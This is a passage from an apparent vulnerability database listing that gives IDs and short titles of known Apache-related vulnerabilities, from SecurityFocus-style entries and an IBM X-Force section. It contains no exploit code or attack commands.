13921| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
13922| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
13923| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
13924| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
13925| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
13926| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
13927| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
13928| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
13929| [6117] Apache mod_php File Descriptor Leakage Vulnerability
13930| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
13931| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
13932| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
13933| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
13934| [5992] Apache HTDigest Insecure Temporary File Vulnerability
13935| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
13936| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
13937| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
13938| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
13939| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
13940| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
13941| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
13942| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
13943| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
13944| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
13945| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
13946| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
13947| [5485] Apache 2.0 Path Disclosure Vulnerability
13948| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
13949| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
13950| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
13951| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
13952| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
13953| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
13954| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
13955| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
13956| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
13957| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
13958| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
13959| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
13960| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
13961| [4437] Apache Error Message Cross-Site Scripting Vulnerability
13962| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
13963| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
13964| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
13965| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
13966| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
13967| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
13968| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
13969| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
13970| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
13971| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
13972| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
13973| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
13974| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
13975| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
13976| [3596] Apache Split-Logfile File Append Vulnerability
13977| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
13978| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
13979| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
13980| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
13981| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
13982| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
13983| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
13984| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
13985| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
13986| [3169] Apache Server Address Disclosure Vulnerability
13987| [3009] Apache Possible Directory Index Disclosure Vulnerability
13988| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
13989| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
13990| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
13991| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
13992| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
13993| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
13994| [2216] Apache Web Server DoS Vulnerability
13995| [2182] Apache /tmp File Race Vulnerability
13996| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
13997| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
13998| [1821] Apache mod_cookies Buffer Overflow Vulnerability
13999| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
14000| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
14001| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
14002| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
14003| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
14004| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
14005| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
14006| [1457] Apache::ASP source.asp Example Script Vulnerability
14007| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
14008| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
14009|
14010| IBM X-Force - https://exchange.xforce.ibmcloud.com:
14011| [86258] Apache CloudStack text fields cross-site scripting
14012| [85983] Apache Subversion mod_dav_svn module denial of service
14013| [85875] Apache OFBiz UEL code execution
14014| [85874] Apache OFBiz Webtools View Log screen cross-site scripting
14015| [85871] Apache HTTP Server mod_session_dbd unspecified
14016| [85756] Apache Struts OGNL expression command execution
14017| [85755] Apache Struts DefaultActionMapper class open redirect
14018| [85586] Apache ActiveMQ CVE-2013-1879 cross-site scripting
14019| [85574] Apache HTTP Server mod_dav denial of service
14020| [85573] Apache Struts Showcase App OGNL code execution
14021| [85496] Apache CXF denial of service
14022| [85423] Apache Geronimo RMI classloader code execution
14023| [85326] Apache Santuario XML Security for C++ buffer overflow
14024| [85323] Apache Santuario XML Security for Java spoofing
14025| [85319] Apache Qpid Python client SSL spoofing
14026| [85019] Apache Santuario XML Security for C++ CVE-2013-2156 buffer overflow
14027| [85018] Apache Santuario XML Security for C++ CVE-2013-2155 denial of service
14028| [85017] Apache Santuario XML Security for C++ CVE-2013-2154 buffer overflow
14029| [85016] Apache Santuario XML Security for C++ CVE-2013-2153 spoofing
14030| [84952] Apache Tomcat CVE-2012-3544 denial of service
14031| [84763] Apache Struts CVE-2013-2135 security bypass
14032| [84762] Apache Struts CVE-2013-2134 security bypass
14033| [84719] Apache Subversion CVE-2013-2088 command execution
14034| [84718] Apache Subversion CVE-2013-2112 denial of service
14035| [84717] Apache Subversion CVE-2013-1968 denial of service
14036| [84577] Apache Tomcat security bypass
14037| [84576] Apache Tomcat symlink
14038| [84543] Apache Struts CVE-2013-2115 security bypass
14039| [84542] Apache Struts CVE-2013-1966 security bypass
14040| [84154] Apache Tomcat session hijacking
14041| [84144] Apache Tomcat denial of service
14042| [84143] Apache Tomcat information disclosure
14043| [84111] Apache HTTP Server command execution
14044| [84043] Apache Virtual Computing Lab cross-site scripting
14045| [84042] Apache Virtual Computing Lab cross-site scripting
14046| [83782] Apache CloudStack information disclosure
14047| [83781] Apache CloudStack security bypass
14048| [83720] Apache ActiveMQ cross-site scripting
14049| [83719] Apache ActiveMQ denial of service
14050| [83718] Apache ActiveMQ denial of service
14051| [83263] Apache Subversion denial of service
14052| [83262] Apache Subversion denial of service
14053| [83261] Apache Subversion denial of service
14054| [83259] Apache Subversion denial of service
14055| [83035] Apache mod_ruid2 security bypass
14056| [82852] Apache Qpid federation_tag security bypass
14057| [82851] Apache Qpid qpid::framing::Buffer denial of service
14058| [82758] Apache Rave User RPC API information disclosure
14059| [82663] Apache Subversion svn_fs_file_length() denial of service
14060| [82642] Apache Qpid qpid::framing::Buffer::checkAvailable() denial of service
14061| [82641] Apache Qpid AMQP denial of service
14062| [82626] Apache HTTP Server on Debian GNU/Linux Debian apache2ctl symlink
14063| [82618] Apache Commons FileUpload symlink
14064| [82360] Apache HTTP Server manager interface cross-site scripting
14065| [82359] Apache HTTP Server hostnames cross-site scripting
14066| [82338] Apache Tomcat log/logdir information disclosure
14067| [82328] Apache Maven and Apache Maven Wagon SSL spoofing
14068| [82268] Apache OpenJPA deserialization command execution
14069| [81981] Apache CXF UsernameTokens security bypass
14070| [81980] Apache CXF WS-Security security bypass
14071| [81398] Apache OFBiz cross-site scripting
14072| [81240] Apache CouchDB directory traversal
14073| [81226] Apache CouchDB JSONP code execution
14074| [81225] Apache CouchDB Futon user interface cross-site scripting
14075| [81211] Apache Axis2/C SSL spoofing
14076| [81167] Apache CloudStack DeployVM information disclosure
14077| [81166] Apache CloudStack AddHost API information disclosure
14078| [81165] Apache CloudStack createSSHKeyPair API information disclosure
14079| [80518] Apache Tomcat cross-site request forgery security bypass
14080| [80517] Apache Tomcat FormAuthenticator security bypass
14081| [80516] Apache Tomcat NIO denial of service
14082| [80408] Apache Tomcat replay-countermeasure security bypass
14083| [80407] Apache Tomcat HTTP Digest Access Authentication security bypass
14084| [80317] Apache Tomcat slowloris denial of service
14085| [79984] Apache Commons HttpClient SSL spoofing
14086| [79983] Apache CXF SSL spoofing
14087| [79830] Apache Axis2/Java SSL spoofing
14088| [79829] Apache Axis SSL spoofing
14089| [79809] Apache Tomcat DIGEST security bypass
14090| [79806] Apache Tomcat parseHeaders() denial of service
14091| [79540] Apache OFBiz unspecified
14092| [79487] Apache Axis2 SAML security bypass
14093| [79212] Apache Cloudstack code execution
14094| [78734] Apache CXF SOAP Action security bypass
14095| [78730] Apache Qpid broker denial of service
14096| [78617] Eucalyptus Apache Santuario (XML Security for Java) denial of service
14097| [78563] Apache mod_pagespeed module unspecified cross-site scripting
14098| [78562] Apache mod_pagespeed module security bypass
14099| [78454] Apache Axis2 security bypass
14100| [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
14101| [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
14102| [78321] Apache Wicket unspecified cross-site scripting
14103| [78183] Apache Struts parameters denial of service
14104| [78182] Apache Struts cross-site request forgery
14105| [78153] Apache Solr Autocomplete module for Drupal autocomplete results cross-site scripting
14106| [77987] mod_rpaf module for Apache denial of service
14107| [77958] Apache Struts skill name code execution
14108| [77914] Apache HTTP Server mod_negotiation module cross-site scripting
14109| [77913] Apache HTTP Server mod_proxy_ajp information disclosure
14110| [77568] Apache Qpid broker security bypass
14111| [77421] Apache Libcloud spoofing
14112| [77059] Oracle Solaris Cluster Apache Tomcat Agent unspecified
14113| [77046] Oracle Solaris Apache HTTP Server information disclosure
14114| [76837] Apache Hadoop information disclosure
14115| [76802] Apache Sling CopyFrom denial of service
14116| [76692] Apache Hadoop symlink
14117| [76535] Apache Roller console cross-site request forgery
14118| [76534] Apache Roller weblog cross-site scripting
14119| [76152] Apache CXF elements security bypass
14120| [76151] Apache CXF child policies security bypass
14121| [75983] MapServer for Windows Apache file include
14122| [75857] Apache Commons Compress and Apache Ant bzip2 denial of service
14123| [75558] Apache POI denial of service
14124| [75545] PHP apache_request_headers() buffer overflow
14125| [75302] Apache Qpid SASL security bypass
14126| [75211] Debian GNU/Linux apache 2 cross-site scripting
14127| [74901] Apache HTTP Server LD_LIBRARY_PATH privilege escalation
14128| [74871] Apache OFBiz FlexibleStringExpander code execution
14129| [74870] Apache OFBiz multiple cross-site scripting
14130| [74750] Apache Hadoop unspecified spoofing
14131| [74319] Apache Struts XSLTResult.java file upload
14132| [74313] Apache Traffic Server header buffer overflow
14133| [74276] Apache Wicket directory traversal
14134| [74273] Apache Wicket unspecified cross-site scripting
14135| [74181] Apache HTTP Server mod_fcgid module denial of service
14136| [73690] Apache Struts OGNL code execution
14137| [73432] Apache Solr extension for TYPO3 unspecified cross-site scripting
14138| [73100] Apache MyFaces in directory traversal
14139| [73096] Apache APR hash denial of service
14140| [73052] Apache Struts name cross-site scripting
14141| [73030] Apache CXF UsernameToken security bypass
14142| [72888] Apache Struts lastName cross-site scripting
14143| [72758] Apache HTTP Server httpOnly information disclosure
14144| [72757] Apache HTTP Server MPM denial of service
14145| [72585] Apache Struts ParameterInterceptor security bypass
14146| [72438] Apache Tomcat Digest security bypass
14147| [72437] Apache Tomcat Digest security bypass
14148| [72436] Apache Tomcat DIGEST security bypass
14149| [72425] Apache Tomcat parameter denial of service
14150| [72422] Apache Tomcat request object information disclosure
14151| [72377] Apache HTTP Server scoreboard security bypass
14152| [72345] Apache HTTP Server HTTP request denial of service
14153| [72229] Apache Struts ExceptionDelegator command execution
14154| [72089] Apache Struts ParameterInterceptor directory traversal
14155| [72088] Apache Struts CookieInterceptor command execution
14156| [72047] Apache Geronimo hash denial of service
14157| [72016] Apache Tomcat hash denial of service
14158| [71711] Apache Struts OGNL expression code execution
14159| [71654] Apache Struts interfaces security bypass
14160| [71620] Apache ActiveMQ failover denial of service
14161| [71617] Apache HTTP Server mod_proxy module information disclosure
14162| [71508] Apache MyFaces EL security bypass
14163| [71445] Apache HTTP Server mod_proxy security bypass
14164| [71203] Apache Tomcat servlets privilege escalation
14165| [71181] Apache HTTP Server ap_pregsub() denial of service
14166| [71093] Apache HTTP Server ap_pregsub() buffer overflow
14167| [70336] Apache HTTP Server mod_proxy information disclosure
14168| [69804] Apache HTTP Server mod_proxy_ajp denial of service
14169| [69472] Apache Tomcat AJP security bypass
14170| [69396] Apache HTTP Server ByteRange filter denial of service
14171| [69394] Apache Wicket multi window support cross-site scripting
14172| [69176] Apache Tomcat XML information disclosure
14173| [69161] Apache Tomcat jsvc information disclosure
14174| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
14175| [68541] Apache Tomcat sendfile information disclosure
14176| [68420] Apache XML Security denial of service
14177| [68238] Apache Tomcat JMX information disclosure
14178| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
14179| [67804] Apache Subversion control rules information disclosure
14180| [67803] Apache Subversion control rules denial of service
14181| [67802] Apache Subversion baselined denial of service
14182| [67672] Apache Archiva multiple cross-site scripting
14183| [67671] Apache Archiva multiple cross-site request forgery
14184| [67564] Apache APR apr_fnmatch() denial of service
14185| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
14186| [67515] Apache Tomcat annotations security bypass
14187| [67480] Apache Struts s:submit information disclosure
14188| [67414] Apache APR apr_fnmatch() denial of service
14189| [67356] Apache Struts javatemplates cross-site scripting
14190| [67354] Apache Struts Xwork cross-site scripting
14191| [66676] Apache Tomcat HTTP BIO information disclosure
14192| [66675] Apache Tomcat web.xml security bypass
14193| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
14194| [66241] Apache HttpComponents information disclosure
14195| [66154] Apache Tomcat ServletSecurity security bypass
14196| [65971] Apache Tomcat ServletSecurity security bypass
14197| [65876] Apache Subversion mod_dav_svn denial of service
14198| [65343] Apache Continuum unspecified cross-site scripting
14199| [65162] Apache Tomcat NIO connector denial of service
14200| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
14201| [65160] Apache Tomcat HTML Manager interface cross-site scripting
14202| [65159] Apache Tomcat ServletContect security bypass
14203| [65050] Apache CouchDB web-based administration UI cross-site scripting
14204| [64773] Oracle HTTP Server Apache Plugin unauthorized access
14205| [64473] Apache Subversion blame -g denial of service
14206| [64472] Apache Subversion walk() denial of service
14207| [64407] Apache Axis2 CVE-2010-0219 code execution
14208| [63926] Apache Archiva password privilege escalation
14209| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
14210| [63493] Apache Archiva credentials cross-site request forgery
14211| [63477] Apache Tomcat HttpOnly session hijacking
14212| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
14213| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
14214| [62959] Apache Shiro filters security bypass
14215| [62790] Apache Perl cgi module denial of service
14216| [62576] Apache Qpid exchange denial of service
14217| [62575] Apache Qpid AMQP denial of service
14218| [62354] Apache Qpid SSL denial of service
14219| [62235] Apache APR-util apr_brigade_split_line() denial of service
14220| [62181] Apache XML-RPC SAX Parser information disclosure
14221| [61721] Apache Traffic Server cache poisoning
14222| [61202] Apache Derby BUILTIN authentication functionality information disclosure
14223| [61186] Apache CouchDB Futon cross-site request forgery
14224| [61169] Apache CXF DTD denial of service
14225| [61070] Apache Jackrabbit search.jsp SQL injection
14226| [61006] Apache SLMS Quoting cross-site request forgery
14227| [60962] Apache Tomcat time cross-site scripting
14228| [60883] Apache mod_proxy_http information disclosure
14229| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
14230| [60264] Apache Tomcat Transfer-Encoding denial of service
14231| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
14232| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
14233| [59413] Apache mod_proxy_http timeout information disclosure
14234| [59058] Apache MyFaces unencrypted view state cross-site scripting
14235| [58827] Apache Axis2 xsd file include
14236| [58790] Apache Axis2 modules cross-site scripting
14237| [58299] Apache ActiveMQ queueBrowse cross-site scripting
14238| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
14239| [58056] Apache ActiveMQ .jsp source code disclosure
14240| [58055] Apache Tomcat realm name information disclosure
14241| [58046] Apache HTTP Server mod_auth_shadow security bypass
14242| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
14243| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
14244| [57429] Apache CouchDB algorithms information disclosure
14245| [57398] Apache ActiveMQ Web console cross-site request forgery
14246| [57397] Apache ActiveMQ createDestination.action cross-site scripting
14247| [56653] Apache HTTP Server DNS spoofing
14248| [56652] Apache HTTP Server DNS cross-site scripting
14249| [56625] Apache HTTP Server request header information disclosure
14250| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
14251| [56623] Apache HTTP Server mod_proxy_ajp denial of service
14252| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
14253| [55857] Apache Tomcat WAR files directory traversal
14254| [55856] Apache Tomcat autoDeploy attribute security bypass
14255| [55855] Apache Tomcat WAR directory traversal
14256| [55210] Intuit component for Joomla! Apache information disclosure
14257| [54533] Apache Tomcat 404 error page cross-site scripting
14258| [54182] Apache Tomcat admin default password
14259| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
14260| [53666] Apache HTTP Server Solaris pollset support denial of service
14261| [53650] Apache HTTP Server HTTP basic-auth module security bypass
14262| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
14263| [53041] mod_proxy_ftp module for Apache denial of service
14264| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
14265| [51953] Apache Tomcat Path Disclosure
14266| [51952] Apache Tomcat Path Traversal
14267| [51951] Apache stronghold-status Information Disclosure
14268| [51950] Apache stronghold-info Information Disclosure
14269| [51949] Apache PHP Source Code Disclosure
14270| [51948] Apache Multiviews Attack
14271| [51946] Apache JServ Environment Status Information Disclosure
14272| [51945] Apache error_log Information Disclosure
14273| [51944] Apache Default Installation Page Pattern Found
14274| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
14275| [51942] Apache AXIS XML External Entity File Retrieval
14276| [51941] Apache AXIS Sample Servlet Information Leak
14277| [51940] Apache access_log Information Disclosure
14278| [51626] Apache mod_deflate denial of service
14279| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
14280| [51365] Apache Tomcat RequestDispatcher security bypass
14281| [51273] Apache HTTP Server Incomplete Request denial of service
14282| [51195] Apache Tomcat XML information disclosure
14283| [50994] Apache APR-util xml/apr_xml.c denial of service
14284| [50993] Apache APR-util apr_brigade_vprintf denial of service
14285| [50964] Apache APR-util apr_strmatch_precompile() denial of service
14286| [50930] Apache Tomcat j_security_check information disclosure
14287| [50928] Apache Tomcat AJP denial of service
14288| [50884] Apache HTTP Server XML ENTITY denial of service
14289| [50808] Apache HTTP Server AllowOverride privilege escalation
14290| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
14291| [50059] Apache mod_proxy_ajp information disclosure
14292| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
14293| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
14294| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
14295| [49921] Apache ActiveMQ Web interface cross-site scripting
14296| [49898] Apache Geronimo Services/Repository directory traversal
14297| [49725] Apache Tomcat mod_jk module information disclosure
14298| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
14299| [49712] Apache Struts unspecified cross-site scripting
14300| [49213] Apache Tomcat cal2.jsp cross-site scripting
14301| [48934] Apache Tomcat POST doRead method information disclosure
14302| [48211] Apache Tomcat header HTTP request smuggling
14303| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
14304| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
14305| [47709] Apache Roller "
14306| [47104] Novell Netware ApacheAdmin console security bypass
14307| [47086] Apache HTTP Server OS fingerprinting unspecified
14308| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
14309| [45791] Apache Tomcat RemoteFilterValve security bypass
14310| [44435] Oracle WebLogic Apache Connector buffer overflow
14311| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
14312| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
14313| [44156] Apache Tomcat RequestDispatcher directory traversal
14314| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
14315| [43885] Oracle WebLogic Server Apache Connector buffer overflow
14316| [42987] Apache HTTP Server mod_proxy module denial of service
14317| [42915] Apache Tomcat JSP files path disclosure
14318| [42914] Apache Tomcat MS-DOS path disclosure
14319| [42892] Apache Tomcat unspecified unauthorized access
14320| [42816] Apache Tomcat Host Manager cross-site scripting
14321| [42303] Apache 403 error cross-site scripting
14322| [41618] Apache-SSL ExpandCert() authentication bypass
14323| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
14324| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
14325| [40614] Apache mod_jk2 HTTP Host header buffer overflow
14326| [40562] Apache Geronimo init information disclosure
14327| [40478] Novell Web Manager webadmin-apache.conf security bypass
14328| [40411] Apache Tomcat exception handling information disclosure
14329| [40409] Apache Tomcat native (APR based) connector weak security
14330| [40403] Apache Tomcat quotes and %5C cookie information disclosure
14331| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
14332| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
14333| [39867] Apache HTTP Server mod_negotiation cross-site scripting
14334| [39804] Apache Tomcat SingleSignOn information disclosure
14335| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
14336| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
14337| [39608] Apache HTTP Server balancer manager cross-site request forgery
14338| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
14339| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
14340| [39472] Apache HTTP Server mod_status cross-site scripting
14341| [39201] Apache Tomcat JULI logging weak security
14342| [39158] Apache HTTP Server Windows SMB shares information disclosure
14343| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
14344| [38951] Apache::AuthCAS Perl module cookie SQL injection
14345| [38800] Apache HTTP Server 413 error page cross-site scripting
14346| [38211] Apache Geronimo SQLLoginModule authentication bypass
14347| [37243] Apache Tomcat WebDAV directory traversal
14348| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
14349| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
14350| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
14351| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
14352| [36782] Apache Geronimo MEJB unauthorized access
14353| [36586] Apache HTTP Server UTF-7 cross-site scripting
14354| [36468] Apache Geronimo LoginModule security bypass
14355| [36467] Apache Tomcat functions.jsp cross-site scripting
14356| [36402] Apache Tomcat calendar cross-site request forgery
14357| [36354] Apache HTTP Server mod_proxy module denial of service
14358| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
14359| [36336] Apache Derby lock table privilege escalation
14360| [36335] Apache Derby schema privilege escalation
14361| [36006] Apache Tomcat "
14362| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
14363| [35999] Apache Tomcat \"
14364| [35795] Apache Tomcat CookieExample cross-site scripting
14365| [35536] Apache Tomcat SendMailServlet example cross-site scripting
14366| [35384] Apache HTTP Server mod_cache module denial of service
14367| [35097] Apache HTTP Server mod_status module cross-site scripting
14368| [35095] Apache HTTP Server Prefork MPM module denial of service
14369| [34984] Apache HTTP Server recall_headers information disclosure
14370| [34966] Apache HTTP Server MPM content spoofing
14371| [34965] Apache HTTP Server MPM information disclosure
14372| [34963] Apache HTTP Server MPM multiple denial of service
14373| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
14374| [34869] Apache Tomcat JSP example Web application cross-site scripting
14375| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
14376| [34496] Apache Tomcat JK Connector security bypass
14377| [34377] Apache Tomcat hello.jsp cross-site scripting
14378| [34212] Apache Tomcat SSL configuration security bypass
14379| [34210] Apache Tomcat Accept-Language cross-site scripting
14380| [34209] Apache Tomcat calendar application cross-site scripting
14381| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
14382| [34167] Apache Axis WSDL file path disclosure
14383| [34068] Apache Tomcat AJP connector information disclosure
14384| [33584] Apache HTTP Server suEXEC privilege escalation
14385| [32988] Apache Tomcat proxy module directory traversal
14386| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
14387| [32708] Debian Apache tty privilege escalation
14388| [32441] ApacheStats extract() PHP call unspecified
14389| [32128] Apache Tomcat default account
14390| [31680] Apache Tomcat RequestParamExample cross-site scripting
14391| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
14392| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
14393| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
14394| [30456] Apache mod_auth_kerb off-by-one buffer overflow
14395| [29550] Apache mod_tcl set_var() format string
14396| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
14397| [28357] Apache HTTP Server mod_alias script source information disclosure
14398| [28063] Apache mod_rewrite off-by-one buffer overflow
14399| [27902] Apache Tomcat URL information disclosure
14400| [26786] Apache James SMTP server denial of service
14401| [25680] libapache2 /tmp/svn file upload
14402| [25614] Apache Struts lookupMap cross-site scripting
14403| [25613] Apache Struts ActionForm denial of service
14404| [25612] Apache Struts isCancelled() security bypass
14405| [24965] Apache mod_python FileSession command execution
14406| [24716] Apache James spooler memory leak denial of service
14407| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
14408| [24158] Apache Geronimo jsp-examples cross-site scripting
14409| [24030] Apache auth_ldap module multiple format strings
14410| [24008] Apache mod_ssl custom error message denial of service
14411| [24003] Apache mod_auth_pgsql module multiple syslog format strings
14412| [23612] Apache mod_imap referer field cross-site scripting
14413| [23173] Apache Struts error message cross-site scripting
14414| [22942] Apache Tomcat directory listing denial of service
14415| [22858] Apache Multi-Processing Module code allows denial of service
14416| [22602] RHSA-2005:582 updates for Apache httpd not installed
14417| [22520] Apache mod-auth-shadow "
14418| [22466] ApacheTop symlink
14419| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
14420| [22006] Apache HTTP Server byte-range filter denial of service
14421| [21567] Apache mod_ssl off-by-one buffer overflow
14422| [21195] Apache HTTP Server header HTTP request smuggling
14423| [20383] Apache HTTP Server htdigest buffer overflow
14424| [19681] Apache Tomcat AJP12 request denial of service
14425| [18993] Apache HTTP server check_forensic symlink attack
14426| [18790] Apache Tomcat Manager cross-site scripting
14427| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
14428| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
14429| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
14430| [17961] Apache Web server ServerTokens has not been set
14431| [17930] Apache HTTP Server HTTP GET request denial of service
14432| [17785] Apache mod_include module buffer overflow
14433| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
14434| [17473] Apache HTTP Server Satisfy directive allows access to resources
14435| [17413] Apache htpasswd buffer overflow
14436| [17384] Apache HTTP Server environment variable configuration file buffer overflow
14437| [17382] Apache HTTP Server IPv6 apr_util denial of service
14438| [17366] Apache HTTP Server mod_dav module LOCK denial of service
14439| [17273] Apache HTTP Server speculative mode denial of service
14440| [17200] Apache HTTP Server mod_ssl denial of service
14441| [16890] Apache HTTP Server server-info request has been detected
14442| [16889] Apache HTTP Server server-status request has been detected
